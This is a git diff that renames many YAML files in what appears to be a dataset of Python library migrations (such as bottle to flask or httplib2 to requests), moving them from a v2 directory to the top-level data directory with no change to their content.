data/migration/botocore__boto__whoopinc@mkwheelhouse__54806ff.yaml diff --git a/v2/data/migration/botocore__boto__zalando@spilo__a83681c.yaml b/data/migration/botocore__boto__zalando@spilo__a83681c.yaml similarity index 100% rename from v2/data/migration/botocore__boto__zalando@spilo__a83681c.yaml rename to data/migration/botocore__boto__zalando@spilo__a83681c.yaml diff --git a/v2/data/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml b/data/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml similarity index 100% rename from v2/data/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml rename to data/migration/bottle__flask__cqmoe@python-cqhttp__f9f083e.yaml diff --git a/v2/data/migration/bottle__flask__heyman@locust__4067b92.yaml b/data/migration/bottle__flask__heyman@locust__4067b92.yaml similarity index 100% rename from v2/data/migration/bottle__flask__heyman@locust__4067b92.yaml rename to data/migration/bottle__flask__heyman@locust__4067b92.yaml diff --git a/v2/data/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml b/data/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml similarity index 100% rename from v2/data/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml rename to data/migration/bottle__flask__nicolas-van@pygreen__843c8cf.yaml diff --git a/v2/data/migration/bunch__munch__1and1@confluencer__df895ac.yaml b/data/migration/bunch__munch__1and1@confluencer__df895ac.yaml similarity index 100% rename from v2/data/migration/bunch__munch__1and1@confluencer__df895ac.yaml rename to data/migration/bunch__munch__1and1@confluencer__df895ac.yaml diff --git 
a/v2/data/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml b/data/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml similarity index 100% rename from v2/data/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml rename to data/migration/bunch__munch__fedora-infra@python-fedora__aca2a20.yaml diff --git a/v2/data/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml b/data/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml similarity index 100% rename from v2/data/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml rename to data/migration/celery__rq__sapfir0@premier-eye__a7375cc.yaml diff --git a/v2/data/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml b/data/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml similarity index 100% rename from v2/data/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml rename to data/migration/characteristic__attrs__rackerlabs@mimic__5bb4946.yaml diff --git a/v2/data/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml b/data/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml similarity index 100% rename from v2/data/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml rename to data/migration/chardet__cchardet__emlid@ntripbrowser__9161c19.yaml diff --git a/v2/data/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml b/data/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml similarity index 100% rename from v2/data/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml rename to data/migration/cheetah3__jinja2__openstack@ironic__cbf214b.yaml diff --git a/v2/data/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml b/data/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml similarity index 100% rename from v2/data/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml rename to data/migration/cheetah3__jinja2__shingetsu@saku__d1ad50a.yaml diff --git a/v2/data/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml b/data/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml similarity index 100% rename from v2/data/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml rename to data/migration/cheetah__jinja2__shingetsu@saku__d1ad50a.yaml diff --git a/v2/data/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml b/data/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml similarity index 100% rename from v2/data/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml rename to data/migration/click__argparse__kittenparry@meituri-downloader__422d73b.yaml diff --git a/v2/data/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml b/data/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml similarity index 100% rename from v2/data/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml rename to data/migration/click__argparse__neurostuff@nimare__2b80aa2.yaml diff --git a/v2/data/migration/click__argparse__nodepy@nodepy__715142c.yaml b/data/migration/click__argparse__nodepy@nodepy__715142c.yaml similarity index 100% rename from v2/data/migration/click__argparse__nodepy@nodepy__715142c.yaml rename to data/migration/click__argparse__nodepy@nodepy__715142c.yaml diff --git a/v2/data/migration/click__argparse__titusz@onixcheck__f17d186.yaml b/data/migration/click__argparse__titusz@onixcheck__f17d186.yaml similarity index 100% rename from v2/data/migration/click__argparse__titusz@onixcheck__f17d186.yaml rename to 
data/migration/click__argparse__titusz@onixcheck__f17d186.yaml diff --git a/v2/data/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml b/data/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml similarity index 100% rename from v2/data/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml rename to data/migration/cloud-sptheme__sphinx-rtd-theme__danielyule@hearthbreaker__d018edf.yaml diff --git a/v2/data/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml b/data/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml similarity index 100% rename from v2/data/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml rename to data/migration/configparser__configobj__ctlearn-project@ctlearn__2375af8.yaml diff --git a/v2/data/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml b/data/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml similarity index 100% rename from v2/data/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml rename to data/migration/configparser__configobj__dbcli@mycli__b7a0b0f.yaml diff --git a/v2/data/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml b/data/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml rename to data/migration/csv__unicodecsv__ckan@ckanext-datapackager__a6a3fb3.yaml diff --git a/v2/data/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml b/data/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml rename to data/migration/csv__unicodecsv__codesy@codesy__b5824f4.yaml diff --git a/v2/data/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml b/data/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml rename to data/migration/csv__unicodecsv__heroku@salesforce-bulk__2f787fa.yaml diff --git a/v2/data/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml b/data/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml rename to data/migration/csv__unicodecsv__mlsecproject@combine__efe20ac.yaml diff --git a/v2/data/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml b/data/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml rename to data/migration/csv__unicodecsv__praekelt@molo__567b66f.yaml diff --git a/v2/data/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml b/data/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml rename to data/migration/csv__unicodecsv__radremedy@radremedy__8fa9b7f.yaml diff --git a/v2/data/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml b/data/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml similarity index 100% rename from v2/data/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml rename to data/migration/csv__unicodecsv__shoopio@shoop__639e3b5.yaml diff --git a/v2/data/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml 
b/data/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml similarity index 100% rename from v2/data/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml rename to data/migration/dataproperty__typepy__thombashi@datetimerange__936761f.yaml diff --git a/v2/data/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml b/data/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml similarity index 100% rename from v2/data/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml rename to data/migration/dataproperty__typepy__thombashi@pingparsing__45fac3c.yaml diff --git a/v2/data/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml b/data/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml similarity index 100% rename from v2/data/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml rename to data/migration/dataproperty__typepy__thombashi@sqlitebiter__26c8e74.yaml diff --git a/v2/data/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml b/data/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml similarity index 100% rename from v2/data/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml rename to data/migration/dill__cloudpickle__blaze@distributed__6dc1f3f.yaml diff --git a/v2/data/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml b/data/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml similarity index 100% rename from v2/data/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml rename to data/migration/dill__cloudpickle__rapid-design-of-systems-laboratory@beluga__078e3e5.yaml diff --git a/v2/data/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml b/data/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml similarity index 100% rename from v2/data/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml rename to data/migration/django-rest-swagger__drf-yasg__bcgov@theorgbook__728f86e.yaml diff --git a/v2/data/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml b/data/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml similarity index 100% rename from v2/data/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml rename to data/migration/django-rest-swagger__drf-yasg__opengisch@qfieldcloud__4377d67.yaml diff --git a/v2/data/migration/django__utils__rq@django-rq__310ac1d.yaml b/data/migration/django__utils__rq@django-rq__310ac1d.yaml similarity index 100% rename from v2/data/migration/django__utils__rq@django-rq__310ac1d.yaml rename to data/migration/django__utils__rq@django-rq__310ac1d.yaml diff --git a/v2/data/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml b/data/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml similarity index 100% rename from v2/data/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml rename to data/migration/docopt__argparse__aio-libs@aioftp__ba6ef08.yaml diff --git a/v2/data/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml b/data/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml similarity index 100% rename from v2/data/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml rename to data/migration/docopt__argparse__deepspace2@styleframe__ffc8d76.yaml diff --git a/v2/data/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml 
b/data/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml similarity index 100% rename from v2/data/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml rename to data/migration/docopt__argparse__mete0r@pyhwp__0c5c5e7.yaml diff --git a/v2/data/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml b/data/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml similarity index 100% rename from v2/data/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml rename to data/migration/docopt__click__michaeljoseph@changes__d9a8fae.yaml diff --git a/v2/data/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml b/data/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml similarity index 100% rename from v2/data/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml rename to data/migration/ed25519__pynacl__romanz@trezor-agent__e1bbdb4.yaml diff --git a/v2/data/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml b/data/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml similarity index 100% rename from v2/data/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml rename to data/migration/enum__aenum__princetonuniversity@psyneulink__5253a55.yaml diff --git a/v2/data/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml b/data/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml similarity index 100% rename from v2/data/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml rename to data/migration/ethereum__ethereum-utils__omisego@plasma-contracts__fc4ac19.yaml diff --git a/v2/data/migration/eventlet__gevent__c00w@bithopper__6612526.yaml b/data/migration/eventlet__gevent__c00w@bithopper__6612526.yaml similarity index 100% rename from v2/data/migration/eventlet__gevent__c00w@bithopper__6612526.yaml rename to data/migration/eventlet__gevent__c00w@bithopper__6612526.yaml diff --git a/v2/data/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml b/data/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml similarity index 100% rename from v2/data/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml rename to data/migration/eventlet__gevent__noisyboiler@wampy__f87f7be.yaml diff --git a/v2/data/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml b/data/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml similarity index 100% rename from v2/data/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml rename to data/migration/eventlet__gevent__phuks-co@throat__9a28960.yaml diff --git a/v2/data/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml b/data/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml similarity index 100% rename from v2/data/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml rename to data/migration/eventlet__gevent__stefal@rtkbase__a4c347a.yaml diff --git a/v2/data/migration/fabric3__invoke__skoczen@will__437f8be.yaml b/data/migration/fabric3__invoke__skoczen@will__437f8be.yaml similarity index 100% rename from v2/data/migration/fabric3__invoke__skoczen@will__437f8be.yaml rename to data/migration/fabric3__invoke__skoczen@will__437f8be.yaml diff --git a/v2/data/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml b/data/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml similarity index 100% rename from v2/data/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml rename to data/migration/fabric3__paramiko__mirantis@openstack-lbaas__d7440d4.yaml 
diff --git a/v2/data/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml b/data/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml similarity index 100% rename from v2/data/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml rename to data/migration/flask-restful__flask-restplus__kizniche@mycodo__047263b.yaml diff --git a/v2/data/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml b/data/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml similarity index 100% rename from v2/data/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml rename to data/migration/flask-restful__flask-restplus__testdrivenio@flask-react-aws__d4119a0.yaml diff --git a/v2/data/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml b/data/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml similarity index 100% rename from v2/data/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml rename to data/migration/flask-restful__flask-restplus__ziirish@burp-ui__8ef3b62.yaml diff --git a/v2/data/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml b/data/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml similarity index 100% rename from v2/data/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml rename to data/migration/flask-restplus__flask-restx__apryor6@flaskerize__59d8319.yaml diff --git a/v2/data/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml b/data/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml similarity index 100% rename from v2/data/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml rename to data/migration/flask-restplus__flask-restx__kizniche@mycodo__5169173.yaml diff --git a/v2/data/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml b/data/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml similarity index 100% rename from v2/data/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml rename to data/migration/flask-restplus__flask-restx__orchest@orchest__6b629d0.yaml diff --git a/v2/data/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml b/data/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml similarity index 100% rename from v2/data/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml rename to data/migration/flask-restplus__flask-restx__pythondataintegrator@pythondataintegrator__598f275.yaml diff --git a/v2/data/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml b/data/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml similarity index 100% rename from v2/data/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml rename to data/migration/flask__bottle__arosenfeld@immunedb__6141b13.yaml diff --git a/v2/data/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml b/data/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml similarity index 100% rename from v2/data/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml rename to data/migration/flask__fastapi__bretttolbert@verbecc-svc__24a848d.yaml diff --git a/v2/data/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml b/data/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml similarity index 100% 
rename from v2/data/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml rename to data/migration/flask__fastapi__virtuber@openvtuber__3abbc43.yaml diff --git a/v2/data/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml b/data/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml similarity index 100% rename from v2/data/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml rename to data/migration/flask__quart__elblogbruno@notionai-mymind__002f5bd.yaml diff --git a/v2/data/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml b/data/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml similarity index 100% rename from v2/data/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml rename to data/migration/flask__quart__intel@stacks-usecase__22cc3f0.yaml diff --git a/v2/data/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml b/data/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml similarity index 100% rename from v2/data/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml rename to data/migration/flask__quart__learningorchestra@learningorchestra__db7f132.yaml diff --git a/v2/data/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml b/data/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml similarity index 100% rename from v2/data/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml rename to data/migration/flask__quart__pgjones@faster_than_flask_article__0a70f2b.yaml diff --git a/v2/data/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml b/data/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml similarity index 100% rename from v2/data/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml rename to data/migration/flask__quart__synesthesiam@voice2json__7ea7ddb.yaml diff --git a/v2/data/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml b/data/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml similarity index 100% rename from v2/data/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml rename to data/migration/flask__quart__talkpython@async-techniques-python-course__aa607bd.yaml diff --git a/v2/data/migration/flask__tornado__krischer@instaseis__13c26a6.yaml b/data/migration/flask__tornado__krischer@instaseis__13c26a6.yaml similarity index 100% rename from v2/data/migration/flask__tornado__krischer@instaseis__13c26a6.yaml rename to data/migration/flask__tornado__krischer@instaseis__13c26a6.yaml diff --git a/v2/data/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml b/data/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml similarity index 100% rename from v2/data/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml rename to data/migration/flask__uvicorn__virtuber@openvtuber__3abbc43.yaml diff --git a/v2/data/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml b/data/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml similarity index 100% rename from v2/data/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml rename to data/migration/fuzzywuzzy__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml diff --git a/v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml b/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml similarity index 100% rename from 
v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml rename to data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__45d94dd.yaml diff --git a/v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml b/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml similarity index 100% rename from v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml rename to data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__963f347.yaml diff --git a/v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml b/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml similarity index 100% rename from v2/data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml rename to data/migration/gcloud-aio-core__aiohttp__talkiq@gcloud-aio__d15540f.yaml diff --git a/v2/data/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml b/data/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml similarity index 100% rename from v2/data/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml rename to data/migration/gcloud__google__googlecloudplatform@gcloud-python__e55a1d8.yaml diff --git a/v2/data/migration/gcloud__google__wal-e@wal-e__be9820b.yaml b/data/migration/gcloud__google__wal-e@wal-e__be9820b.yaml similarity index 100% rename from v2/data/migration/gcloud__google__wal-e@wal-e__be9820b.yaml rename to data/migration/gcloud__google__wal-e@wal-e__be9820b.yaml diff --git a/v2/data/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml b/data/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml rename to data/migration/gevent__eventlet__duanhongyi@dwebsocket__d707ff6.yaml diff --git a/v2/data/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml b/data/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml rename to data/migration/gevent__eventlet__miguelgrinberg@flask-socketio__883e73e.yaml diff --git a/v2/data/migration/gevent__eventlet__projectcalico@felix__657e727.yaml b/data/migration/gevent__eventlet__projectcalico@felix__657e727.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__projectcalico@felix__657e727.yaml rename to data/migration/gevent__eventlet__projectcalico@felix__657e727.yaml diff --git a/v2/data/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml b/data/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml rename to data/migration/gevent__eventlet__stefal@rtkbase__cf856c0.yaml diff --git a/v2/data/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml b/data/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml similarity index 100% rename from v2/data/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml rename to data/migration/gevent__eventlet__thenetcircle@dino__119d922.yaml diff --git a/v2/data/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml b/data/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml similarity index 100% rename from v2/data/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml rename to 
data/migration/gunicorn__waitress__openphilology@nidaba__4bab2ee.yaml
diff --git a/v2/data/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml b/data/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml
similarity index 100%
rename from v2/data/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml
rename to data/migration/guzzle-sphinx-theme__sphinx-rtd-theme__jamesls@semidbm__aa0baba.yaml
diff --git a/v2/data/migration/html5lib__bleach__posativ@isso__f1a4478.yaml b/data/migration/html5lib__bleach__posativ@isso__f1a4478.yaml
similarity index 100%
rename from v2/data/migration/html5lib__bleach__posativ@isso__f1a4478.yaml
rename to data/migration/html5lib__bleach__posativ@isso__f1a4478.yaml
diff --git a/v2/data/migration/html5lib__bleach__pycon@pycon__3dba963.yaml b/data/migration/html5lib__bleach__pycon@pycon__3dba963.yaml
similarity index 100%
rename from v2/data/migration/html5lib__bleach__pycon@pycon__3dba963.yaml
rename to data/migration/html5lib__bleach__pycon@pycon__3dba963.yaml
diff --git a/v2/data/migration/httplib2__requests__ankitects@anki__f6245cd.yaml b/data/migration/httplib2__requests__ankitects@anki__f6245cd.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__ankitects@anki__f6245cd.yaml
rename to data/migration/httplib2__requests__ankitects@anki__f6245cd.yaml
diff --git a/v2/data/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml b/data/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml
rename to data/migration/httplib2__requests__cpfair@tapiriik__495db93.yaml
diff --git a/v2/data/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml b/data/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml
rename to data/migration/httplib2__requests__hasgeek@flask-lastuser__6114ad5.yaml
diff --git a/v2/data/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml b/data/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml
rename to data/migration/httplib2__requests__hpe-storage@python-3parclient__75b94d3.yaml
diff --git a/v2/data/migration/httplib2__requests__jarodl@flask-github__341c769.yaml b/data/migration/httplib2__requests__jarodl@flask-github__341c769.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__jarodl@flask-github__341c769.yaml
rename to data/migration/httplib2__requests__jarodl@flask-github__341c769.yaml
diff --git a/v2/data/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml b/data/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml
rename to data/migration/httplib2__requests__jgorset@facepy__89ba1d4.yaml
diff --git a/v2/data/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml b/data/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml
rename to data/migration/httplib2__requests__openshot@openshot-qt__4349753.yaml
diff --git a/v2/data/migration/httplib2__requests__openstack@deb-nova__346d941.yaml b/data/migration/httplib2__requests__openstack@deb-nova__346d941.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__openstack@deb-nova__346d941.yaml
rename to data/migration/httplib2__requests__openstack@deb-nova__346d941.yaml
diff --git a/v2/data/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml b/data/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml
rename to data/migration/httplib2__requests__openstack@networking-cisco__075010a.yaml
diff --git a/v2/data/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml b/data/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml
similarity index 100%
rename from v2/data/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml
rename to data/migration/httplib2__requests__wikimedia@pywikibot__952665a.yaml
